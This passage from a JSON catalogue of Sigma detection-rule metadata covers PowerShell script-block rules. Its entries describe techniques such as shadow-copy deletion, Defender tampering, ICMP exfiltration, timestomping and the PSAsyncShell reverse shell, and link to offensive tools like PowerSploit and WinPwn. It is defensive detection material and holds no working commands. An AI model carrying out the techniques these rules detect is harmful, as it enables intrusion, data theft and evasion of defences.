them and resolve DNS host entries.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-05", "falsepositive": [ "The same functionality can be implemented by admin scripts, correlate with name and creator" ], "filename": "posh_ps_resolve_list_of_ip_from_file.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.fortypoundhead.com/showcontent.asp?artid=24022", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml" ], "tags": [ "attack.exfiltration", "attack.t1020" ] }, "related": [ { "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fbc5e92f-3044-4e73-a5c6-1c4359b539de", "value": "PowerShell Script With File Hostname Resolving Capabilities" }, { "description": "Detects a known WMI recon method used to look for unquoted service paths, often found in pentest and attacker PowerShell enumeration scripts", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Unknown" ], "filename": "posh_ps_wmi_unquoted_service_search.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "09658312-bc27-4a3b-91c5-e49ab9046d1b", "value": "WMIC Unquoted Services Path Lookup - PowerShell" }, { "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-16", "falsepositive": [ "Legitimate administration activities" ], "filename": "posh_ps_software_discovery.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", "https://github.com/harleyQu1nn/AggressorScripts", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1518" ] }, "related": [ { "dest-uuid": "e3b6daca-e963-4a69-aee6-ed4fd653ad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", "value": "Detected Windows Software Discovery - PowerShell" }, { "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", "meta": { "author": "frack113", "creation_date": "2022-01-19", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_xml_iex.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", "value": "Powershell XML Execute Command" }, { "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe 
COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (i.e. external to .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", "meta": { "author": "frack113", "creation_date": "2021-12-30", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_cor_profiler.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml" ], "tags": [ "attack.persistence", "attack.t1574.012" ] }, "related": [ { "dest-uuid": "ffeb0780-356e-4261-b036-cfb6bd234335", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "23590215-4702-4a70-8805-8dc9e58314a2", "value": "Registry-Free Process Scope COR_PROFILER" }, { "description": "Detects calls to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes, often used in \"enum\" scripts by attackers", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-21", "falsepositive": [ "Legitimate administration scripts" ], "filename": "posh_ps_hotfix_enum.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml" ], "tags": [ "attack.discovery" ] }, "uuid": 
"f5d1def8-1de0-4a0e-9794-1f6f27dd605c", "value": "PowerShell Hotfix Enumeration" }, { "description": "Detects PowerShell scripts to set the ACL to a file in the Windows folder", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-18", "falsepositive": [ "Unknown" ], "filename": "posh_ps_set_acl_susp_location.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1", "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_acl_susp_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1222" ] }, "related": [ { "dest-uuid": "65917ae0-b854-4139-83fe-bf2441cf0196", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3bf1d859-3a7e-44cb-8809-a99e066d3478", "value": "PowerShell Set-Acl On Windows Folder - PsScript" }, { "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", "meta": { "author": "frack113", "creation_date": "2021-12-26", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_win32_shadowcopy.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", "value": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script" }, { "description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework", "meta": { "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)", "creation_date": "2019-02-11", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_keywords.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, 
"related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", "value": "Potential Suspicious PowerShell Keywords" }, { "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", "meta": { "author": "Bartlomiej Czyz @bczyz1, oscd.community", "creation_date": "2020-10-10", "falsepositive": [ "Legitimate usage of System.Net.NetworkInformation.Ping class" ], "filename": "posh_ps_icmp_exfiltration.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml" ], "tags": [ "attack.exfiltration", "attack.t1048.003" ] }, "related": [ { "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4c4af3cd-2115-479c-8193-6b8bfce9001c", "value": "PowerShell ICMP Exfiltration" }, { "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-16", "falsepositive": [ "Unknown" ], "filename": "posh_ps_win_defender_exclusions_added.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562", "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c1344fa2-323b-4d2e-9176-84b4d4821c88", "value": "Windows Defender Exclusions Added - PowerShell" }, { "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-17", "falsepositive": [ "Rare intended use of hidden services", "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "filename": "posh_ps_using_set_service_to_hide_services.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "953945c5-22fe-4a92-9f8a-a9edc1e522da", "value": "Abuse of Service Permissions to Hide Services 
Via Set-Service - PS" }, { "description": "Adversaries may communicate using a protocol and port pairing that are typically not associated with each other.\nFor example, HTTPS over port 8088 (Citation: Symantec Elfin Mar 2019) or port 587 (Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", "meta": { "author": "frack113", "creation_date": "2022-01-23", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_test_netconnection.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", "https://learn.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" ], "tags": [ "attack.command-and-control", "attack.t1571" ] }, "related": [ { "dest-uuid": "b18eae87-b469-4e14-b454-b171b416bc18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", "value": "Testing Usage of Uncommonly Used Port" }, { "description": "Detects creation of a local user via PowerShell", "meta": { "author": "@ROxPinTeddy", "creation_date": "2020-04-11", "falsepositive": [ "Legitimate user creation" ], "filename": "posh_ps_create_local_user.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.persistence", "attack.t1136.001" ] }, 
"related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "243de76f-4725-4f2e-8225-a8a69b15ad61", "value": "PowerShell Create Local User" }, { "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", "meta": { "author": "Sami Ruohonen", "creation_date": "2018-07-24", "falsepositive": [ "Unknown" ], "filename": "posh_ps_ntfs_ads_access.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20220614030603/http://www.powertheshell.com/ntfsstreams/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8c521530-5169-495d-a199-0a3a881ad24e", "value": "NTFS Alternate Data Stream" }, { "description": "Detects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse", "meta": { "author": "Michael Haag", "creation_date": "2024-09-03", "falsepositive": [ "Legitimate PowerShell Web Access installations by administrators" ], "filename": "posh_ps_powershell_web_access_installation.yml", "level": 
"high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a", "https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41", "https://docs.microsoft.com/en-us/powershell/module/powershellwebaccess/install-pswawebapplication", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powershell_web_access_installation.yml" ], "tags": [ "attack.persistence", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f9c7f1a-7c21-4c39-b2f3-8d8006e0e51f", "value": "PowerShell Web Access Installation - PsScript" }, { "description": "Detects Cmdlet names from PowerView of the PowerSploit exploitation framework.", "meta": { "author": "Bhabesh Raj", "creation_date": "2021-05-18", "falsepositive": [ "Unknown" ], "filename": "posh_ps_powerview_malicious_commandlets.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=2277", "https://thedfirreport.com/2020/10/08/ryuks-return", "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", "https://powersploit.readthedocs.io/en/stable/Recon/README", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dcd74b95-3f36-4ed9-9598-0490951643aa", "value": "PowerView PowerShell Cmdlets - ScriptBlock" }, { "description": "Detects suspicious PowerShell invocation command parameters", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", 
"creation_date": "2017-03-05", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_invocation_specific.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", "value": "Suspicious PowerShell Invocations - Specific" }, { "description": "Detect use of X509Enrollment", "meta": { "author": "frack113", "creation_date": "2022-12-23", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_x509enrollment.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "504d63cb-0dba-4d02-8531-e72981aace2c", "value": "Suspicious X509Enrollment - Ps Script" }, { "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", "meta": { "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "creation_date": "2020-10-05", 
"falsepositive": [ "App-V clients" ], "filename": "posh_ps_syncappvpublishingserver_exe.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dddfebae-c46f-439c-af7a-fdb6bde90218", "value": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction" }, { "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", "meta": { "author": "frack113", "creation_date": "2022-02-01", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_unblock_file.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.005" ] }, "related": [ { "dest-uuid": "7e7c2fba-7cca-486c-9582-4c1bb2851961", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5947497f-1aa4-41dd-9693-c9848d58727d", "value": "Suspicious Unblock-File" }, { "description": "Detects attempts to remove Windows Defender configuration using the 'MpPreference' 
cmdlet", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-05", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_tamper_windows_defender_rem_mp.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae2bdd58-0681-48ac-be7f-58ab4e593458", "value": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging" }, { "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers or properties within Active Directory.", "meta": { "author": "frack113", "creation_date": "2022-03-17", "falsepositive": [ "Unknown" ], "filename": "posh_ps_get_adcomputer.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1087.002/T1087.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml" ], "tags": [ "attack.discovery", "attack.t1018", "attack.t1087.002" ] }, "related": [ { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": 
"21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36bed6b2-e9a0-4fff-beeb-413a92b86138", "value": "Active Directory Computers Enumeration With Get-AdComputer" }, { "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", "meta": { "author": "frack113", "creation_date": "2021-08-03", "falsepositive": [ "Legitimate admin script" ], "filename": "posh_ps_timestomp.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", "https://www.offensive-security.com/metasploit-unleashed/timestomp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.006" ] }, "related": [ { "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c6438007-e081-42ce-9483-b067fbef33c3", "value": "Powershell Timestomp" }, { "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", "meta": { "author": "frack113", "creation_date": "2022-01-12", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_create_volume_shadow_copy.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", 
"https://attack.mitre.org/datasources/DS0005/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "afd12fed-b0ec-45c9-a13d-aa86625dac81", "value": "Create Volume Shadow Copy with Powershell" }, { "description": "Detects the use of PSAsyncShell, an asynchronous TCP reverse shell written in PowerShell", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-04", "falsepositive": [ "Unlikely" ], "filename": "posh_ps_psasyncshell.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/JoelGMSec/PSAsyncShell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "afd3df04-948d-46f6-ae44-25966c44b97f", "value": "PSAsyncShell - Asynchronous TCP Reverse Shell" }, { "description": "Detects scriptblock text keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.\n", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2023-12-04", "falsepositive": [ "As the script block is a blob of text, false positives may occur with scripts that contain the keyword as a reference or simply use it for detection." 
], "filename": "posh_ps_hktl_winpwn.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/S3cur3Th1sSh1t/WinPwn", "https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841", "https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/", "https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team", "https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hktl_winpwn.yml" ], "tags": [ "attack.credential-access", "attack.defense-evasion", "attack.discovery", "attack.execution", "attack.privilege-escalation", "attack.t1046", "attack.t1082", "attack.t1106", "attack.t1518", "attack.t1548.002", "attack.t1552.001", "attack.t1555", "attack.t1555.003" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e3b6daca-e963-4a69-aee6-ed4fd653ad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", "tags": [ 
